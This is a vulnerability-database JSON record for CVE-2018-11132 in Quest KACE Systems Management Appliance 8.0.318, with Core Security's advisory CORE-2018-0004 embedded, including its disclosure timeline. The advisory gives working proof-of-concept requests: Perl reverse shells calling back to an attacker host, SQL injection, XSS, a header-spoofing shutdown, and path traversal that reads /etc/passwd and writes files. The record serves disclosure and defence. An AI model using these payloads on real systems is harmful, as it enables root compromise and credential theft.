{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication channel, also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified that the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise Quest would take legal action.
2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. 
With regards to Quest's requests, Core provided the researchers' names and the URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked for the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide the actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0592",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11132"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11132",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-11132",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-10906",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11132",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11132",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-10906",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1222",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11132",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10906"
},
{
"db": "VULMON",
"id": "CVE-2018-11132"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005456"
},
{
"db": "NVD",
"id": "CVE-2018-11132"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1222"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "In order to perform actions that require higher privileges, the Quest KACE System Management Appliance 8.0.318 relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed. A command injection vulnerability exists within this message queue which allows low-privilege users to append arbitrary commands that will be run as root. Quest KACE System Management Appliance Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. 
*Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. 
\n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. 
*Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. 
The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 
20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. 
\n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. 
\n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, 
OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. 
